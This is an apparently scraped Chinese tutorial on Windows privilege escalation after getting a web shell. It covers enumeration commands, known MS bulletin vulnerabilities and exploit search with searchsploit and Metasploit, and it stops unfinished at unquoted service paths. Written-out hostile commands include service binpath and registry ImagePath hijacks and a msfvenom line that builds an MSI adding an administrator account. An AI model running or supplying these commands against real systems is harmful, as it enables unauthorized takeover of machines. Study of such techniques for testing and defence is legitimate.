您好,欢迎访问代理记账网站
  • 价格透明
  • 信息保密
  • 进度掌控
  • 售后无忧

权限提升部分思路

权限提升


权限提升简称提权。现在的操作系统都是多用户操作系统,用户之间都有权限控制,比如通过web漏洞拿到的是web进程的权限,往往web服务都是一个权限很低的账号启动的,因此通过webshell进行一些操作会受到限制,这就需要将其提升为管理甚至是System权限。

一、Windows提权


范围较广主要的提权方式还是利用自身漏洞或者错误配置,例如利用缓冲区溢出提权、windows错误系统配置提权、任意用户以NTAUTHORIITY\SYSTEM权限安装MSI提权、启动项和组策略提权、计划任务提权和进程注入提权等,下面的实列都以拿到一个shell为基础进行介绍。

1.溢出提权


溢出提权是指攻击者利用系统本身或系统中的软件漏洞来获取Windows操作系统System权限,其中溢出提权又分为远程溢出和本地溢出。远程溢出需要与远程服务器建立连接,然后根据系统漏洞使用相应的溢出程序获取远程服务器的windows操作系统system权限。本地溢出程序,然后在服务器执行,如果系统存在漏洞,那么将会溢出获得Windows操作系统system权限。

通常利用缓冲区溢出提权步骤如下:
(1)信息收集,如查看当前权限、查看版本、补丁。
(2)根据收集到的信息确定可利用漏洞
(3)根据漏洞查找EXP
(4) 使用EXP提权

1.1信息收集常用命令

查看当前用户权限	whoami
查看目标系统、版本及补丁	systeminfo | findstr /L/C:OS/C:KB
查看主机名	hostname
查看当前用户	echo %username%
查看所有用户	net user
查看用户详细信息	net user 用户名
查看环境变量	set
查看所有网络接口	ipconfig/all
查看路由表	route print
查看所有接口的ARP缓存表	arp -A
查看活动的网络接口、端口、PID	netstat -ano
查看防火墙状态	netsh firewall show state
查看防火墙配置	netsh firewall show config
查看计划任务详情	schtasks /query/fo LIST/v
查看系统进程提供的任务	tasklist /svc
查看启动的服务	net start
查看系统驱动程序	driverquery
查看目录和文件权限	icacls “C:\Program Files\"
查看服务详细配置	sc qc 服务名
关闭服务	sc stop 服务名
启动服务	sc start 服务名
修改服务的binpath	sc config "服务名"binpath="C:\exp.exe"
查看注册表AlwaysInstallElevated的值 Installer /v AlwaysInstallElevated	reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
修改服务路径	reg add "HKLM\SYSTEM\ControlSet001\Services\服务名"/t REG_EXPAND_SZ /v ImagePath /d "服务路径" /f
生成添加管理员的MSI安装文件	msfvenom -p windows/adduser USER=a$ PASS=123456Pp.-f msi-o /exp.msi


1.2使用WMIC枚举目标信息


WMIC被认为是windows最有用的命令行工具,通过WMIC可以快速枚举目标的系统信息。使用WMIC枚举目标信息常用命令如下:

查看计算机补丁 wmic qfe list
查看系统位数 wmic cpu get addrewidth
列出进程 wmic process list brief
获取进程路径 wmic process get description,executablepath
查看启动项 wmic startup
查看共享 wmic share get name,path
查看安装的软件版本 wmic product get name,version
查看是否为虚拟机 wmic bios list full | find /i"vmware"
查看是否为虚拟机 wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

查看补丁
在这里插入图片描述

1.3常见Windows提权的漏洞点

MS03-026
MS05-039
MS06-040
MS08-025
MS08-066
MS08-067
MS08-068
MS09-012
MS09-020
MS09-050
MS10-012
MS10-015
MS10-048
MS10-059
MS10-065
MS10-092
MS11-011

等等

1.4搜索EXP


1.Searchsploit 搜索EXP
Github上有公开的Exploit -DB漏洞存储库,地址为"https://github.com/offensive-security/exploitdb",而Searchsploit是Exploit-DB的命令行搜索工具,kali自带Exploit-DB和SearchSploit。下面介绍kali
使用命令"searchsploit MS17"搜索微软2017年所有漏洞

在这里插入图片描述
2.Metasploit搜索EXP
metasploit,可以查找、利用和验证漏洞
在这里插入图片描述3.搜索网上对外公开的EXP
通过exploit-db.com 的title对目标漏洞进行搜索exp
https://www.exploit-db.com/search?q=ms03

1.5溢出实列

可参考ms17-010(永恒之蓝)搭建、攻击、打补丁

可对攻破后的主机进行提权

2.错误系统配置提权

是否存在可利用的错误系统配置,例如路径未加引号或未指定可执行文件路劲等,这些问题都有可能会造成路径拦截,若是被高权限的进程拦截启动了恶意文件,该恶意文件可能是攻击者生成的具有反弹shell或添加了管理账户等危险操作的木马,恶意文件会以该进程的权限执行危险操作,从而导致权限提升。

2.1Trusted Service Paths漏洞


…啥时候想写的时候在写


分享:

低价透明

统一报价,无隐形消费

金牌服务

一对一专属顾问7*24小时金牌服务

信息保密

个人信息安全有保障

售后无忧

服务出问题客服经理全程跟进